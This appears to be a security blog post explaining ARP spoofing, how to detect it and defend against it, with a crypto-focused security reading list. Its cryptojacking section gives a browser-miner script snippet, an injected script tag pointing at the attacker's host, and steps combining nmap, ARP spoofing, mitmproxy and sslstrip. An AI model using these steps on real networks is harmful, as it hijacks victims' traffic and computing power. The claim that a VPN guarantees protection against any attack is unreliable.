What is ARP spoofing and how to protect against it?
0xB25C
September 9th, 2022

Introduction

“Spoof” sounds like a sound effect for an airbag going off in a car or something. Sure, “spoofing” sounds like a funny word but when it comes to security it is anything but. It is the intentional act of camouflaging malicious actors and intent under the guise of legitimate behavior.

Spoofing is an advanced persistent threat and if you’re identified as a vulnerable target with multiple weak links and attack vectors, hackers will continue to come after you until you either give them an opening or close up your weaknesses.

It seems like hackers are coming up with new attack methods every single day and it’s hard to keep up with their endless creativity. Security researchers call it “creativity” because you have to have an inventive mind to search and think up new ways to exploit the vulnerable.

But...how to protect yourself from such an attack & what does it stand for? Let's find out!

The ARP Protocol

To understand how ARP spoofing works, we need a basic knowledge of the ARP protocol. Now, ARP stands for “address resolution protocol.” Everything dealing with sending data (packets) from one computer to another is governed by protocols, like this one.

ARP is a specific communication protocol that connects a dynamic IP address to a device's MAC address and data flow on the local network. For example, host A on a computer network wants to connect its IP address to the MAC address of host B.

To do this, it sends an ARP request to all other hosts on the local network. After this request, it receives an ARP response from host B with its MAC address. Then the requesting host stores this address in its ARP cache, similar to a contact list.

This is where the attackers come in. Posing as host B, they send messages to host A. As a result, the hacker's address is stored in the ARP cache as the address of host B and will receive the messages intended for the host.

For a better understanding let's look at this situation from another angle! Let’s say you are an attacker. ARP spoofing is the act of intercepting traffic by linking your own MAC address to a legitimate IP address and sending acknowledgments back to the computer that originally sent this traffic.

The point is to trick the original sender into thinking you (the attacker) are the intended recipient of this data. This way, the sender will continue to ship traffic to you and all of the precious data that comes with it.

If you choose to intercept the traffic, this is known as a MITM (man in the middle) attack, which allows you to view and/or manipulate the information you receive. There is a little more to this attack, but all you ultimately need to know is that ARP spoofing is essentially pretending to be the recipient of data that is not yours.

IP (internet protocol) spoofing is a little different. The most common purpose of IP spoofing is mainly for denial-of-service attacks, in which an attacker creates fake IP addresses to send connection requests to a victim that cannot be fulfilled, which hogs up the bandwidth of the victim.

This leads to all sorts of problems, like crashed websites, denied connections to streaming services etc. I recommend you watch this video on IP spoofing denial of service attacks to get a better understanding:

Spoofing or Impersonation?

Impersonation and spoofing are the two main forms of phishing attacks aimed at employees. While the two terms seem interchangeable, they refer to very similar but fundamentally different methods of attack. If it tricks a computer, it's a spoofing attack. If it tricks a human, it's an impersonation attack.

What is ARP spoofing stand for?

For espionage, MITM and DoS attacks. Let us briefly discuss each of these tasks:

  • Espionage - hackers simply watch the data stream between hosts A and B without changing it;

  • MITM attack or mediator attack - attackers change information before sending it to the target host;

  • DoS attack - cybercriminals block data transmission between two or more hosts.

❗️ ARP spoofing is not only used by hackers. It helps developers to debug network traffic and is also used by pen-tests to simulate ARP cache poisoning.

www.researchgate.net/figure/ARP-Cache-Poisoning-Man-In-The-Middle-Attack_fig1_251925083
www.researchgate.net/figure/ARP-Cache-Poisoning-Man-In-The-Middle-Attack_fig1_251925083

Consequences of ARP spoofing-based attacks

If attackers are spying on the victim, conducting a MITM attack, or planning other attacks in the future, the victim may not even notice any consequences from the ARP spoofing. But once the hackers' end goal has been reached, they may try to overload the computer with malware or infect the system with ransomware.

With ARP spoofing, hackers gain access to victims' personal data. In addition, these attacks can be used to introduce malware.

How can I detect ARP spoofing?

To check if your ARP has been spoofed, look for the ARP protocol cache. Any device configuration management software will do. If your ARP cache contains two IP addresses with the same MAC address, you may have fallen victim to an attack.

Hackers usually use fake software that sends messages that its address is the default gateway address. You can also look through ARP traffic for unsolicited messages claiming ownership of your router's IP or MAC address. Such messages are almost always a signal of an ARP spoofing attack.

How to protect against ARP spoofing?

There are several tools to protect against ARP spoofing:

  • Static ARP entries are the simplest way to protect against ARP spoofing. Such an entry is entered manually, preventing the device from automatically changing the ARP cache. Remember, this method can only be used for some entries (such as standard gateway addresses), and client nodes are still vulnerable to attack.

  • ARP request validation software. It certifies IP/MAC addresses and blocks uncertified responses. There is another version of this software, which informs host about changes in ARP cache.

  • Firewalls with packet filtering. They detect attempts to masquerade as another host by flagging packets sent from repeated addresses.

  • Encryption. This is the most important way to protect against an ARP attack. It makes ARP hacking much more difficult and prevents the hacker from reading the messages after they have been intercepted.

  • VPN. When you connect to a VPN, all your data will go through an encrypted tunnel, guaranteed to protect against any hacker attacks.

oreilly.com/library/view/ccna-security-210-260/9781787128873/7f056ffb-f601-4d5e-b0f5-39dcd8deb01d.xhtml
oreilly.com/library/view/ccna-security-210-260/9781787128873/7f056ffb-f601-4d5e-b0f5-39dcd8deb01d.xhtml

Finally, I would like to mention an unusual way of protection - simulating ARP spoofing in your network to find security breaches. Pen-test tools are widely available and easy to use, so this defense strategy against ARP attacks has every right to exist.

Crypto-jacking via ARP Poisoning Attack on Wi-Fi Networks

In order to achieve this goal, it is necessary to use ARP poisoning so that the attacker’s computer (bad guy) is placed in the middle of the communication between the router and the users’ computers (the victims).

This is achieved because the attacker sends Address Resolution Protocol (ARP) messages to the network; ARP spoofed messages; and your MAC Address is identified as the default gateway, i.e., the MAC Address of the attacker is associated with the IP address of the router. When this is performed, all Wi-Fi network traffic destined for this IP address is sent in advance to the attacker (Man-In-The-Middle).

Furthermore, before the ARP Poisoning attack, the attacker must configure an HTTP server on his computer, in order to serve his clients with a piece of code for illegal mining, e.g., through some APIs such as and:

<script>
var miner = new CRLT.Anonymous('YOUR_SITE_PUBLIC_KEY');
miner.start();
</script>

Positioned on the network, the attacker can actively intercept, analyze and change Wi-Fi network traffic. Using, for example, mitmproxy, it can act as an Active Man-In-the-Middle, and inject a line of code in the requests made by the victims. This line of code consists of a Javascript script that calls the code snippet shown above.

(source-code)
...
<script src="man-in-the-middle-IP/crypto-jacking.js"></script>
...
(source-code)

This type of attack works autonomously on a Wi-Fi network and is very easy to execute it. For example:

  • Attacker obtains the IP of the router and victims by scanning the network (e.g., using nmap);

  • Configures IP routing and routing tables;

  • Configures the HTTP server to serve the script for illegal mining;

  • Runs the spoof ARP attack on the network (for all the victims);

  • and Starts mitmproxy and injects the script into Wi-Fi network traffic.

For this setup to be fully functional, it would also be possible to include sslstrip as a way to change all types of Wi-Fi network traffic, namely HTTP and HTTPS requests.

Awareness of the users who visit these cyberspaces and unprotected networks is necessary. This is not a recent problem and it represents a type of scheme used for many years to obtain illegitimate passwords and sensitive content and is still widely used today for wild attacks in computer networks.

Users are asked to be cautious, which is a good decision when connecting to a network with this profile, and a careful attention to the performance of the CPUs of your personal machine.

If your computer is an active node in this type of malicious setups, the machine’s processing power may be higher than normal. There are some extensions to web-browsers, such as UBlock Origin, which blocks and identifies this type of malicious attacks. Or try using a reliable VPN service like a Mullvad.net oVPN configuration!

Wi-Fi Security when holding Crypto assets. Special.

  1. Read this article: www.ledger.com/academy/security/hack

  2. Go through this awesome list: github.com/edelahozuah/awesome-wifi-security

  3. Test github.com/techge/wifi-arsenal

  4. If you are an IoT device owner, then carefully read github.com/nebgnahz/awesome-iot-hacks

  5. Which OS to choose? t.me/officer_cia/344

  6. BGP Hacking www.theverge.com/2018/4/24/17275982/myetherwallet-hack-bgp-dns-hijacking-stolen-ethereum

  7. Microtik security: www.itdave.nl/mikrotik-router-seurity-hardening

  8. Check out: github.com/decalage2/awesome-security-hardening

Be aware of modern attack methods, carefully read step-by-step my Guide and a Compendium, you don't need a deep understanding of how hacks work exactly but that's important to know how does it looks like to be a victim. Counter-OSINT is important here as well. Read about it more here and here.

Study threat modeling (2) (3) and establish all possible threats even if they seem crazy to you. Being suspicion is always a good thing. After all, fake news only works best with those who carry it to their acquaintances, becoming a kind of donor.

In the same way with attacks, very often you may try to be hacked through acquaintances, pretending to be acquaintances or acquaintances themselves. Always keep this in mind. This world is cruel and dangerous.

If we finally want to give people the opportunity to be their own bank, we must realize that in this case people must be able to replace all those services and actions for which traditional banks get money.

Read:

I am not asking you to comply with all of this, but you must remember the main rule:

Your level of OpSec usually depends on your threat model and which adversary you're up against. So it's hard to define how good your OpSec is.

Awesome security guides to follow:

Anonymity:

• hackmd.io/YKjhguQES_KeKYs-v1YC1w?both

• anonymousplanet.org

• DeepWeb/DarkNet OpSec Guide 2022

Privacy:

• yawnbox.com/blog/how-to-use-an-ipad-as-a-secure-calling-and-messaging-device 

• seirdy.one/posts/2022/07/09/stylometric-fingerprinting-redux

• privacyguides.org

OpSec:

• telegra.ph/CIA-Officer--Monero-05-08

• github.com/OffcierCia/Crypto-OpSec-SelfGuard-RoadMap

• www.usenix.org/system/files/1401_08-12_mickens.pdf


The cover for this article was done by my good friend and artist — RegulLion. We know each other well so in case I disappear, he’ll have the exact details of me. Consider this my canary. In this article you will see other works, they do not have scientific meaning, but I would like to include them to help you imagine what we are talking about more clearly and put you in the right frame of mind! Much thanks for a help with editing as well!

All proceeds will go to create a book about blockchain with a unique design:

Kogaan! Zu'u wah dein hin faraan! 🐉


If you want to support my work, please consider donating me:


Sources


Subscribe to CIA Officer's Blog
Receive new entries directly to your inbox.
Collectors
View
#1
#2
#3
View collectors
This entry has been permanently stored on-chain and signed by its creator.